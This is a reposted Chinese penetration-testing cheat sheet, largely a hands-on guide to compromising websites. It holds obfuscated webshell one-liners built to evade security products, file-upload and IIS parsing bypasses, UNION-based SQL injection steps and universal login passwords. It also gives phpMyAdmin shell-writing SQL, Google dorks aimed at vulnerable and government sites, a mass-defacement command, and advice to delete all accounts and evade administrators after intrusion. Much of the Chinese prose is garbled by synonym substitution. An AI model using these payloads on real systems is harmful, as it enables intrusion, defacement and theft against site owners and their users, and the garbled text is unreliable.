渗透测试笔记 转载

日期:2019-10-15编辑作者:www.6165.com

【 拿shell 】

 1.一贯上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就使用IIS6.0深入分析漏洞”:1.asp;1.jpg/1.asp;.jpg/1.asp;jpg/1.asp;.xls

 2.上传图片木马碰到拦截系统,连图片木马都上传不了,记事本展开图片木马在代码最前头加上gif89a,平时就能够逃过拦截类别了。

 3.上传图片木马把地址复制到数据库备份里备份成asp木马,不经常不成功就利用IIs6.0深入分析漏洞尝试突破。

 4.上传图片木马再用抓包工具进行抓包,用明小子的总结上传功效,复制上传地址及cookies填到对应的框里,点击上传就可以。

 

5.当后台有数据库备份蛋未有上传点时,把一句话木马插到跋扈处,再到数据库备份里备份成asp木马,之后用一句话顾客端连接木马就能够。

6.后台点击修改密码,新密码设置为:1″:eval request(“h”)’设置成功后延续asp/config.asp就能够拿下shell

 7.当页面提醒“上传格式不精确[再一次上传]” 则表达存在上传漏洞,复制地址放到明小子里上传,经常都能一直抢占shell。

 8.当后台从未数据库备份但有数据库恢复生机的景色下,请不要犹豫,数据库苏醒跟数据库备份功能是一致的,直接邪恶吧。

 9.假诺知道网址的数据库是asp的,直接在前台找留言板插入一句话木马,连接配置文件inc/config.asp就可以拿下shell。

10.当网站前台有“会员注册” 注册三个账户进去看看有未有上传点,有的话平素上传asp木马以至采用iis6.0深入分析漏洞,不行就抓包用明小子上传。

11.先上传三个.ashx的文本,在速记里找找可找到方法,结果是访问会生成一句话木马文件,后台上传、编辑器上传、上传漏洞页面均可利用此方式。

12.当页面提醒只好上传jpg|gif|png等格式的时候,右键查看源文件,本地修改为asp|asa|php再本地上传就可以拿下shell。

13.当用啊D检查实验注入点提示SA权限或DB权限的时候,尝试列目录找到网站物理路线,再点击cmd/上传,直接上传asp木马就能够,不行就差别备份拿shell。

14.对此有个别上传漏洞的上传页面,以至后台找到的上传页面,能够品味用本地双文本上传突破,第二个选jpg第贰个选cer,推荐应用火狐浏览器。

=============================================================================================================================================================

【 渗透本领 】

1.或多或少cms的网址设置过滤不严,直接在网址背后加上admin/session.asp 或 admin/left.asp 能够绕过后台验证直接进去后台。

2.提下服务器之后建议抓下管理员哈希值,然后删除全部客户满含团结的,今后登入那台服务器就用管理员的账号密码登陆,那样比较安全。

3.侵略网址在此以前接连下3389,能够连接上的话先品尝弱口令,不行就按5次shift键,看看有未有shift后门。

4.做客后台地址时弹出提醒框“请登录” 把地址记出来(复制不了)放到“网页源代码深入分析器”里,采取浏览器-拦截跳转勾选–查看就能够直接步向后台。

5.突破防盗链系统访谈shell代码:javascript:document.write(“<a href=’‘>fuck</a>”) 点击GO就能够步入shell。

6.碰到一级音信监察和控制拦截系统时,上传图片木马或是在木马代码最前方加上gif89a就能够逃过检测。

7.eweb编辑器后台,扩充了asp|asa|cer|php|aspx等扩大名上传时都被过滤了,尝试扩张一个aaspsp,再上传asp就能够深入分析了。

8.用注入工具猜解到表段却猜解不到字段的时候,到网址后台右键查看源文件,日常账号密码前边的正是字段,之后在注入工具里增多字段进展猜解就可以。

9.当注入工具猜健胃段,但猜解字段时提示长度超越50之类,没关系扔到穿山甲(学名:Manis pentadactyla)去猜解一下。

10.获知表段跟字段之后,使用SQL语句在ACCESS数据库里加个客户名及密码的口舌:Insert into admin(user,pwd) values(‘jianmei’,'daxia’)

11.当得到管理员密码却不了解管理员帐号时,到网址前台找信息链接,经常“提交者”“发表者”的名字就是管理员的帐号了。

12.爆破ASP+IIS架设的网址web相对路线,就算网址主页为: 提交,fkbhvv.aspx是不设有的。

13.有的站长很懒什么也不改,当大家获悉网站的cms的时候,不要紧去下载一套找找数据库路线,以致敏感消息,再尝试暗许相关的可使用财富。

14.菜刀里点击一句话木马右键,选拔虚构机终端,实践命令出现乱码时,再次来到去设置编码这里,将默许的GB2312改为UTF-8.

15.侵袭千万别忘了ftp,试试诺口令,ftp的私下认可端口:21  默许帐号密码:test

16.破解出md5为20人结果,只必要把前多少人和后一位去掉,剩余16人拿去解密就能够

17.浩大网址的后台地址是:admin_index.asp manage_login.asp

渗透测试笔记 转载。18.不常在木马代码里丰富了gif89a,上传成功访问的时候却出现了像图片同样的荒谬图像,表达服务器把gif89a当作图片来拍卖了,不要带gif89a就可以。问就足以了。

19.找eweb编辑器的时候,假如暗中同意的被改了,到前台去找图片右键看下路线,依据图片的目录猜eweb编辑器的目录,后台也是用此思路。

20.IIS注册表全版本泄漏客户路线和FTP客户名漏洞:HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots

21.扫旁站的时候,是或不是想看每一个站点是什么样cms呢?用赤霄剑扫描就能够来得系统性情。

22.网址的主站日常都很安全,那时将在旁注或C段了,但是想通晓各类IP段开放了怎么样端口吗?用“啊D互连网工具包”里面包车型大巴IP端口扫描最优异了。

23.手工业检查测验注入点弹出“你的操作已被记录!”之类的音讯,访谈这些文件:sqlin.asp,假若存在,在注入点前边植入一句话木马:‘excute(request(“TNT”))
任何时候用一句话木马客商端连接:,上传木马就能够拿下shell,因为许多防注入程序都以用”sqlin.asp“那几个文件名来做地下记录的数据库。

24.有的后台不显示验证码,往注册表里增加三个ceg就可以突破那个困境了,把下部的代码保存为Code.reg,双击导入就能够了。
REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerSecurity]
“BlockXBM”=dword:00000000

25.内网渗透时尽量少登陆3389,避防被管理员开采;

26.旁注的时候,提议挑php的站点来日,因为php站点平日都帮忙aspx脚本,那样对于提权跟跨目录都轻巧.!

 

=============================================================================================================================================================

【 手工业注入 】

IE浏览器-工具-Internet选项-高端-呈现本身HTTP错误新闻前边的勾去掉,不然不论服务器再次回到什么错误,IE都只彰显为HTTP 500服务器错误,不能收获更加的多的信息。

手工业注入时一旦网站过滤了 and 1=1  and 1=2 ,能够用xor 1=1  xor 1=2 进行决断。

第一步:找注入点

(数字型)

加’           程序报错

加and 1=1     再次回到符合规律页面

加and 1=2     重临错误页面

(字符型)

加’            程序报错

加’and ’1′=’1  重临不荒谬页面

加’and ’1′=’2  再次回到错误页面

流行检测注入点的诀窍:

在U安德拉L地址后边加上-1,若再次回到的页面和前边分裂,是另二个好端端的页面,则象征存在注入漏洞,何况是数字型的注入漏洞。

在U安德拉L地址前面加上-0,若重临的页面和前边的页面一样,然后加上-1,重临错误页面,则也意味着存在注入漏洞,并且是数字型的。

就算报错提醒那么些:

Microsoft JET Database Engine 错误 ’80040e14′

语法错误 (操作符错失) 在查询表明式 ‘ID = 6 ord by’ 中。

/fun/Function.asp,行 657

解明:通过 JET 引擎连接数据库,则是 Access数据库,通过 ODBC 引擎连接数据库,则是 MSSQL数据库。

 

第二步:猜字段数

语句:order by 5

假定猜6的时候回来出错,就一连往回猜,直到回到精确结束…

第三步:UNION命令

语句:and 1=2 union select 1,2,3,4,5–

会见哪个地方能够轮换,假设突显有2,就在2那边替换SCHEMA_NAME,见下

第三步:猜库名

语句:and 1=2 union select 1,SCHEMA_NAME,3,4,5 from information_schema.SCHEMATA limit 1,1

第四步:猜表段

语句:and 1=2 union select 1,TABLE_NAME,3,4,5 from information_schema.TABLES where TABLE_SCHEMA=0x68667A7338383838 limit 1,1

注意,TABLE_SCHEMA=前面包车型客车库名必需是hex转变过的格式,倒数首个1直接替换,直到爆出全部表段,然后选最或然的极度。

第五步:猜字段

and 1=2 union select 1,COLUMN_NAME,3,4,5 from  information_schema.COLUMNS where TABLE_NAME=0x615F61646D696E limit 1,1

注意,TABLE_SCHEMA=后边的表段必需是hex调换过的格式,尾数第二个1直接替换,直到爆出全体字段,然后选最大概的那多个。

第六步:猜内容

语句一:and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin

率先让程序报错,所以在注入点前边加上 and 1=2

语句二: union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin

一直以来是先让程序报错,在178这么些参数前边加上 -

当列名帐号跟列名密码都猜解对的时候,页面将会展现相呼应的内容,平日的密码都经过MD5加密了,解密地址:;  UserName  Password

=============================================================================================================================================================

【 常见网站程序 】

asp类:

foosun(风讯)

kesion(科汛)

 

newasp(新云)

乔客

 

CreateLive(创力)

5uCMS

 

KingCMS

DvBBS(动网)

BBSxp

 

[博客]zblog

[博客]pjblog

PHP类:

DeDeCms(织梦)

ECMS(帝国)

PHPCMS

PHP168

HBcms(宏博)

 

SupeSite

CMSware(思维)

 

Joomla!

[BBS]Discuz!

[BBS]phpWind

 

[SNS]UCenterHome

[SNS]ThinkSNS

 

[商城]EcShop

[商城]ShopEx

 

[博客]WordPress

[维基]HDWiki

[微博]PHPsay

 

[DIGG]PBdigg

( php开源mysql相对路线 )

开源系统             数据库配置文件名                  文件名所在的目录
Discuz!              config.inc.php                    ./ config.inc.php
Phpcms               config.inc.php                    ./include/config.inc.php
Wodpress             wp-config.php                     ./ wp-config.php
Phpwind              sqlconfig.php                     ./data/sqlconfig.php
phpweb               config.inc.php                    ./config.inc.php
Php168v6             mysql_config.php                  ./php168/ mysql_config.php
Shopex               config.php                        ./config/config.php
Ecshop               config.php                        ./data/config.php
Joomla               configuration.php                 ./ configuration.php
UCenter              config.inc.php                    ./data/config.inc.php
EmpireCMS            config.php                        ./e/class/config.php
Dedecms              common.inc.php                    .data/common.inc.php
Zen Cart             configure.php                     ./includes/configure.php
Mediawiki            localsettints.php                 ./config/localsettints.php
Ecshop               config.php                        ./data/config.php
osCommerce           configure.php                     ./includes/configure.php

=============================================================================================================================================================

【 谷歌(Google)黑客语法 】

site:能够界定你寻觅范围的域名.

inurl:用于找出网页上含蓄的U凯雷德L,这么些语法对寻觅网页上的追寻,协助之类的很有用.

intext: 只寻找网页<body>部分中蕴藏的文字(也正是忽略了标题、U奥迪Q5L等的文字)

intitle: 查满含关键词的页面,日常用来社工外人的webshell密码

filetype:搜索文件的后缀只怕扩张名

intitle:限制你搜索的网页题目.

link: 能够拿走二个独具富含了有个别钦定U纳瓦拉L的页面列表.

招来后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

搜求文本内容:site:域名 intext:管理|后台|登录|客商名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

搜索可注入点:site:域名 inurl:aspx|jsp|php|asp

搜寻上传漏洞:site:域名 inurl:file|load|editor|Files

找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

留存的数据库:site:域名 filetype:mdb|asp|#

查看脚本类型:site:域名 filetype:asp/aspx/php/jsp

迂回攻略凌犯:inurl:cms/data/templatesindex/

选取谷歌(Google)黑客飞快找到本身想要的资料:site:qiannao.com 提权录像

=============================================================================================================================================================

【 一句话木马 】

asp一句话木马:<%eval request(“x”)%>

php一句话木马:<?php eval($_POST[g]);?>

aspx一句话:<%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%>

数据库加密一句话(密码a):┼攠數畣整爠煥敵瑳∨≡┩愾

网址配置、版权音讯专项使用一句话:”%><%Eval Request(x)%>

一句话再过护卫神:<%Y=request(“x”)%> <%execute(Y)%>

过拦截一句话木马:<% eXEcGlOBaL ReQuEsT(“x”) %>

asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%

能过安全狗的深入分析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的一句话:<%Y=request(“x”)%> <%eval(Y)%>

elong过安全狗的php一句话:<?php  $a = “a”.”s”.”s”.”e”.”r”.”t”;  $a($_POST[渗透测试笔记 转载。cc]);  ?>

后台常用写入php一句话(密码x):

<?
$fp = @fopen(“c.php”, ‘a’);
@fwrite($fp, ‘<’.'?php’.”rnrn”.’eval($_POST[x])’.”rnrn?”.”>rn”);
@fclose($fp);
?>

 

高强度php一句话:

<?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?>

最新变异PHP一句话(密码b4dboy):

($b4dboy = $_POST['b4dboy']) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

 

突破安全狗的aspx一句话:

<%@ Page Language=”C#” ValidateRequest=”false” %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

 

突破护卫神,保养盾一句话:

<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["test"]); ?>

 

过多网页程序都不允许包涵〈%%〉标志符号的剧情的文件上传,那样一句话木马就写入不进数据库了。

改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉

这般就逃避了采用〈%%〉,保存为.ASP,程序照旧推行的功效是同一的。

 

PHP高强度一句话:

<?php substr(md5($_REQUEST['x']),28)==’acd0′&&eval($_REQUEST['c']);?>   菜刀连接:/x.php?x=lostwolf  脚本项目:php  密码:c

<?php assert($_REQUEST["c"]);?>    菜刀连接 躲避检查实验 密码:c

=============================================================================================================================================================

【 分析漏洞计算 】

IIS 6.0

目录分析:/xx.asp/xx.jpg  xx.jpg可替换为私下文本文件(e.g. xx.txt),文本内容为后门代码
IIS6.0 会将 xx.jpg 解析为 asp 文件。
后缀解析:/xx.asp;.jpg     /xx.asp:.jpg(此处需抓包修改文件名)
IIS6.0 都会把该类后缀文件成功深入分析为 asp 文件。
默许解析:/xx.asa    /xx.cer   /xx.cdx
IIS6.0 暗许的可施行文件除了 asp 还包罗那二种
此地可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

 

IIS 7.0/IIS 7.5/Nginx <8.03

在暗中认可法斯特-CGI开启景况下,在四个文本路线(/xx.jpg)前面加上/xx.php会将 /xx.jpg/xx.php 剖析为 php 文件。
常用利用格局: 将一张图和多个写入后门代码的公文文件合并将恶意文本写入图片的二进制代码之后,幸免毁坏图片文件头和尾
e.g.
copy xx.jpg/b + yy.txt/a xy.jpg
/b 即二进制[binary]模式
/a 即ascii格局 xx.jpg寻常图片文件
yy.txt 内容 <?PHP fputs(fopen(‘shell.php’,'w’),’<?php eval($_POST[cmd])?>’);?>
情趣为写入一个内容为 <?php eval($_POST[cmd])?> 名称为shell.php的文件
找个地点上传 xy.jpg ,然后找到 xy.jpg 的地方,在地点后增加 /xx.php 就能够实行恶意文本。
.然后就在图纸目录下生成一句话木马 shell.php 密码 cmd

=============================================================================================================================================================

【 ewebeditor编辑器 】

私下认可后台:ewebeditor/admin_login.asp

帐号密码:admin admin

体制设计:ewebeditor/admin_style.asp

翻看版本:ewebeditor/dialog/about.html

数据库路线:db/ewebeditor.mdb    db/%23ewebeditor.mdb    db/%23ewebeditor.asp  ewebeditor/db/!@#ewebeditor.asp (用谷歌(Google)语法找文件名)

遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =../..

跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=..  (dir为列目录, ..为回到上层目录),情势:dir ../..

点上传文件管理-随意选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14前面加&dir=../../../.. 就可观看全部网址的文书了(../自个儿加减)

 

( ewebeditor5.5版本 )

暗中认可后台:ewebeditor/admin/login.asp

帐号密码:admin  198825

数据库路线:data/%23sze7xiaohu.mdb

遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup

 

( ewebeditor3.8 php版本 )

暗许后台:eWebEditor/admin/login.php

第一随意输入二个帐号和密码,接着系统会提醒出错,那时清空浏览器的url,然后输入以下代码后连按一次回车键:

javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));

随之访谈文件:ewebeditor/admin/default.php  就能够直接进去后台了。

 

( ewebeditor编辑器exp手册 )

突发性什么后缀都上传了,依旧非常。就扩大多个asp:jpg格式 上传asp:jpg 试试

一:文件上传成功了,然而访问不成功,表明该目录(比方:/UploadFile)棉被服装置了权力,重临去换到/ 上传出根目录就行了.增添asp等十二分的时候,可以行使解析asp;jpg

 

二:下载数据库查看前人留下的划痕,再拜见上传页面拿shell。

页面路线:/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已增加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在说话里拜会,上传相对应的格式木马。

 

=============================================================================================================================================================

【 fckeditor编辑器 】

翻看版本:fckeditor/editor/dialog/fck_about.html

                  FCKeditor/_whatsnew.html

编辑器页面:FCKeditor/_samples/default.html

上传页面:fckeditor/editor/filemanager/connectors/test.html

                 /editor/editor/fckeditor.html

                FCKeditor/editor/filemanager/connectors/aspx/connector.aspx

               FCKeditor/editor/filemanager/connectors/uploadtest.html

遍历目录:FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

编辑页面:fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

翻开文件上传路线:fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=

 

( 拿shell方法总括 )

ASPX的站大致都用fck编辑器,提出用工具扫一下,记住inc目录下恐怕存在fck编辑器,扫下这一个目录。

一:假使是iis6.0,上传四遍 1.asp;.jpg 也许1.asp;1.jpg 也许成立x.asp目录,再在此个目录下上传x.jpg 恐怕直接上传1.asp;jpg 都得以健全深入分析拿下shell

二:第一遍上传1.asp;1.jpg,被重命名称叫:1_asp;1.jpg,然而第2回上传1.asp;1.jpg,就有十分大概率成为:1.asp;1(1).jpg

三:iis7.5+fck的深入分析文件为:a.aspx.a;.a.aspx.jpg..jpg.aspx

四:假使不是iis6.0 上传1.asp;jpg然后抓包,接下去改包,将分店变成空格,再用c32把20改成00,保存,利用%00 截断分号四遍

五:成功访谈别人的一句话木马页面,EditorFilefile/2.asp;2(1).jpg  但不精通密码
EditorFilefile2_asp;2.jpg 这几个是图片木马,未遂利用iis6.0分析漏洞还是图片,下载下来用记事本展开找到密码。

六:IIS7.0/7.5 通杀oday,把php一句话木马后缀改成1.jpg传上去,寻觅一句话的不二诀要后,在1.jpg的后边增添/.php  比如:

 

( 构建文件夹 . 变 _ 的突破艺术 )

行使Fiddler web debugger 那款工具来扩充修改数据包,进而完结突破的指标。

当心:安装Fiddler web debugger,要求安装.net境况以致.net的SP2补丁方可运维!

1.开荒fck的上传页面,比方:fckeditor/editor/filemanager/browser/default/connectors/test.html

渗透测试笔记 转载。2.再展开Fiddler web debugger那款工具,点击设置–自动断点–选用 “恳求此前”

3.随着张开fck的上传页面,创立文件夹,并输入你想要创设的文书名,举个例子:x.asp

4.然后再次回到到Fiddler web debugger那款工具里,接纳链接–点击右边的嗅探

5.修改currentfolder内的参数,改成你要确立的文书夹名字,如:x.asp

6.然后点击侧边的:run to completion

7.再点击软件设置–自动断点–禁止使用,再到浏览器里点击分明创建文件夹,你就能够发觉文件夹建构为x.asp了

=============================================================================================================================================================

 

【 linux 】

分析格式:1.php.xxx (xxx能够是自由)

一经apache不认得后缀为rar的文本,大家就用1.php.rar格式上传,文件就能够棉被和衣服务器当作PHP脚本深入分析。

识假linux系统方法,比方: 把b换来大写B访谈,要是出错了,就申明是linux系统,反之是windows系统.

=============================================================================================================================================================

【 旁注 】

旁注的技艺就是选取援救aspx的站来日,那样提权时候希望相当大,怎么着探测服务器上怎么样站点帮衬aspx呢? 利用bing寻找: 寻找格式:ip:服务器ip aspx

比方要侵略三个网址,想通晓该网址支不援助aspx,就在网址背后随便加上八个xxx.aspx回车,假若突显的不是iis暗中同意的一无所长页面,而是这种:“/”应用程序中的服务器错误,表达援救aspx马。

=============================================================================================================================================================

【 phpmyadmin 】

查看版本:test.php 或 phpinfo.php

暗许账号密码:root root

万能帐号密码:’localhost’@'@” 密码空

拿shell第一种办法:
CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );
INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE ‘d:/wamp/www/darkmoon.php’;
DROP TABLE IF EXISTS `darkmoon`;

 

拿shell第两种办法:
Create TABLE moon (darkmoon text NOT NULL);
Insert INTO moon (darkmoon) VALUES(‘<?php @eval($_POST[pass]);?>’);
select darkmoon from moon into outfile ‘d:/wamp/www/darkmoon2.php’;
Drop TABLE IF EXISTS moon;

拿shell第二种办法:
select ‘<?php @eval($_POST[pass]);?>’INTO OUTFILE ‘d:/wamp/www/darkmoon3.php’

拿shell第八种方法
select ‘<?php echo ’<pre>’;system($_GET['cmd']); echo ’</pre>’; ?>’ INTO OUTFILE ‘d:/wamp/www/darkmoon4.php’
127.0.0.1/darkmoon4.php?cmd=net user

找到mysql数据库,推行sql语句就能够写入一句话,再菜刀连接就能够。

phpmyadmin脱裤:个中是能够直接拖库的,就如上传php拖库脚本同样,操作大致的。

 

修改mysql暗中同意的root客户名艺术:

进入phpmyadmin,进入mysql表,执行sql语句

1.update user set user=’你的新root用户名’ where user=’root’;
2.flush privileges;

例如:

用root身份登录,步入mysql库,修改user表就能够。
1.use mysql;

  1. 3.mysql>update user set user=’newName’ where user=’root’;
  2. 5.mysql> flush privileges;

=============================================================================================================================================================

【 万能密码 】

( php )

帐号:’ UNION Select 1,1,1 FROM admin Where ”=’
密码:1

( asp )

‘xor

‘or’='or’

‘or”=”or”=’

‘or ’1′=’1′or ’1′=’1

‘or 1=1/*

=============================================================================================================================================================

【 批量关键词 】

inurl:asp?id=
inurl:detail.php?
CompHonorBig.asp?id=           牛比
inurl:show.asp? 特别强盛!!!!
site:www.yuming.com
inurl:articleshow.asp?articleid=数字 牛B
inurl:szwyadmin/login.asp
inurl:asp?id=1 intitle:政府
杭州 inurl:Article_Class2.asp?

=============================================================================================================================================================

【 批量挂黑页 】

cmd命令实施 dir d:wwwroot /b >>1.txt

现在命令 for /f “tokens=* delims= ” %i in (d:1.txt) do echo pause>>D:wwwroot%iwwwroot1.txt

=============================================================================================================================================================

【 木马后门 】

1.TNTHK小组内部版 —— 存在首要词后门,随意输入八个错的密码,右键查看源文件,找到错误主要词后边的font,在font后边的便是科学密码。

2.不灭之魂—不死活死人变种 —— 用那款工具专门爆那款马来西亚的密码:爆不灭之魂密码

3.终极防删免杀多职能VIP版本-无后门 —— 万能密码:wbgz   菜刀连接:kk

=============================================================================================================================================================

【 安全狗 】

1.过注入

方法一:a.asp?aaa=%00&id=sql语句

主意二: a.asp?id=sql语句   里面把平安过滤的加个%l 例如: un%aion sel%aect 1,2,3,4 fr%aom admin

2.过马拉西亚被截留访问

措施一:上传二个马来亚 然后拜会; 访问后出现阻挠。

那么化解形式 先将dama.asp改名dama.jpg上传,然后在同目录上传个文件da.asp 内容为: <!–#include file=”dama.jpg” –>  这样再拜见da.asp  就不会被拦住了。

3.过菜刀连接一句话被截留

办法一:不用菜刀连接一句话,用其余一句话连接端。

格局二:中间转播下一而再菜刀,把过滤掉的词替换掉。

=============================================================================================================================================================

【 asp搜索框注入 】

在搜索框里,大家输入三个入眼词,该重大词必须在这几个站能寻找到新闻。举例这一个站自个儿输入了1,搜索到了无数谍报,判别这一个寻觅框是或不是有注入漏动。

一向在前台的搜求框里注入被界定以来,能够本地构造表单进行注入:

<html>
<form name=”form1″ method=”post” action=”“>
类型:
<label>
<input name=”t” type=”text” id=”t” value=”1″>
</label>
<p>
内容:
<label>
<input name=”key” type=”text” id=”key”>
</label>
</p>
<p>
<label>
<input type=”submit” name=”Submit” value=”提交”>
</label>
</p>
</form>

1%’ ‘ and ‘%’='         系统报错

1%’ and 1=1 and ‘%’='   重临正确

1%’ and 1=2 and ‘%’='   重临错误

1%’ and (select count(*) from 表段) and ‘%’='   猜表段

1%’ and (select count(字段) from 表段) and ‘%’='  猜字段

1%’ and (select top 1 len(字段) from 表段)>16 and ‘%’='  猜字段长度

1%’ and (select top 1 asc(mid(name,1,1)) from 表段)>97 and ‘%’='   猜内容

用牛族字符转变器转换数字。(猜长度的时候,选择对的前方那几个错的数字!或是间接把当先号改为等于号,看看科学便是了)

局地网址存在寻觅框,利用这几个找寻框举办注射进而爆出管理帐号密码:%’ and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’=’

我们在搜索框里,寻找关键词1浏览器地址栏展现:http://www.XXXXXX.com/News_search.asp?key=1&otype=msg

那边的key=1,就是说大家搜索得关键词1,大家要做的正是把key=1放到最前边,把连接造成:http://www.XXXXXX.com/News_search.asp?otype=msg&key=1

依旧直接把&otype=msg删除,变成:http://www.XXXXXX.com/News_search.asp?key=1

=============================================================================================================================================================

【 当地构造上传漏洞  】

查找程序上传漏洞,必得从上传页面包车型客车源文件动手,指标有多个:

1.filename (文件名称)  在上传页面中针对文件扩展名过滤不严,进而上传可执行的脚本木马。
2.filepath (文件路线)  在上传页面针对路线过滤不严,导致能够修改上传相对路线上传脚本木马。

当检查测量检验到二个上传页面,asp、asa后缀已经被过滤掉的时候,能够尝尝抓包明小子或NC上传!

特别就动用本地上传漏洞构造上传!举例上传页面是:

1.右键查看源文件,找到这段代码:<form name=”form1″ method=”past” action=”zwhua_upload1.asp” enctype=”multipart/form-data”>

  把以上代码中actino处的渠道补全!即:<form name=”form1″ method=”past” action=”” enctype=”multipart/form-data”>

2.再找到这段代码:<input type=”hidden” name=”filepath” value=”uploadfile/”>

  利用IIS6.0深入分析漏洞,把以上代码中value处的文件补全!即:<input type=”hidden” name=”filepath” value=”uploadfile/1.asa; “>  注意:冒号前面有空格!

3.接着保存为1.html,将刚保存的公文拖进去C32里,采纳十六进制形式,找到“1.asa; ”前边的空格,将其填写为00后保存退出!

4.地面张开上传图片格式的木马(不成功时得以尝尝上传一句话木马) ,假如提醒成功后不显示路线的话,能够右键查看源文件本人手工业搜索路线访谈就可以!

=============================================================================================================================================================

【 利用双文书上传拿shell 】

因为网址只判别一回,若是第二个文件后缀是在白名单里面包车型地铁话,就让其上传,并不曾看清第一个公文,所以上传任特性式的公文也让其通过。

当系统验证cookie的时候,将在用到火狐浏览器了,登入网址进后台,让火狐浏览器保存管理员的cookie值,再把修改后的“双文书上传工具”拖进去上传。

1.在后台找上传点,右键查看源文件,找到上传地址,经常在post或action的周边,搜索就可以找到,日常为:src=”../xxx.htm”  之后补全路线访谈。

2.这么些还不是确实的上传页面,真正的上传页面后缀是asp的,继续查看源代码,找到action=”xxx.asp”,补全路线访谈就可以!

4.其实也得以抓包进而获得上传路线,抓包之后,在Referer:这栏,还应该有广阔的是:htto://www.xxxx.com/upfile_other.asp

3.开发双文书上传工具,替换为当前的上传地址,保存后拖进火狐浏览器里,第贰个挑选jpg木马,首个选用cer木马,提交后右键查看源文件寻觅路线就能够。

=============================================================================================================================================================

【 数据库备份抓包改包NC提交拿shell 】

当备份路线无法修改,后缀又是mdb不改变的时候,大家可先对备份的历程进展抓包,再当地构造用NC提交就能够突破备份,数据库复苏也可使用此格局!

在抓包的时候,最棒用火狐浏览器,因为部分浏览器抓不到包,首先上传一张图纸木马复制下地址,接着对备份进程实行抓包!把抓到的数码复制在文书里面!

开班本地修改,先把POST处补全网站,找到最上边包车型大巴一行数据,再复制多一行相比较长度实行修改,把备份的数额名称替换为木马地址,备份的名目改为协调想要的asp后缀!

再将本来的数码长度跟未来的对照同一时候替换掉,最终看一共扩展了有一点个字符,就在Content-Length:处进行增减,用NC提交数据格式:nc 域名 80<1.txt

=============================================================================================================================================================

【 本地构造数据库备份突破拿shell 】

当上传jpg木马获得路线前去备份时,开采数目库备作用用持续的图景下,能够尝尝本地构造突破拿shell!

先是查看源文件,找到“当前数据库路径”修改为刚上传jpg木马的门道,再找到“数据库备份名称”修改为1.asa

找到“<form method=”past” action=”Backup.asp?action=Backup”>” 将路线补全“<form method=”past” action=”“>”

末尾保存为1.html,有的网址不验证cookie的话,直接张开进行备份就会打响了,不过平时都亟待验证cookie,那时就用上火狐浏览器了。

因为火狐浏览器有保留cookie的功用,首先登场入后台,以管理人的权杖举行上传,直接把1.html拖进火狐浏览器里,直接点击备份就能够突破cookie验证!

=============================================================================================================================================================

【 本地构造限制上传类型漏洞 】

貌似用于直接扫到的上传页面,名称是:上传图片,上传asp、asa等剧本时提醒“请选拔jpg或gif文件!”

此刻通过那一个主意经常都能打响,首先保存到本地1.asp  放到小旋风的目录下,然后找到以下这段代码:

    alert(“请点击浏览开关,选拔你要上传的jpg或gif文件!”)
myform.file1.focus;
return (false);
}
else
{
str= myform.file1.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=”.jpg” && extname!=”.gif”)
{
alert(“请选择jpg或gif文件!”);

看见那句代码:if(extname!=”.jpg” && extname!=”.gif”)  改为:    if(extname!=”.jpg” && extname!=”.gif” && extname!=”.asp”)

接下来补充完整上传地址,action=这里,然后网页张开127.0.0.1 直接上传asp文件就可以了。

=============================================================================================================================================================

【 抓包改包NC提交拿shell 】

1.抓包数据中假诺存在name=”filepath”或是name=”filename”,那么就足以满意NC的上传条件了。

2.将木马的抓包数据复制到文本文件中。举个例子:1.txt

3.将路径补全:

filepath截断法:
uploadfile/路线后增多1.asp空格 (16进制上面将20改为00)

filename自定义名称:
C:Documents and Settingslei桌面1.jpg (将1.jpg 改为 1.asp空格,16进制下将20改为00)

3.在Content-Length处加上../uploadfile/后扩充的字节数。

4.用C32将空格的20改为00,保存为1.txt。

5.把1.txt跟nc.exe放在同等目录下,cmd命令:nc -vv www.XXXX.com 80<1.txt

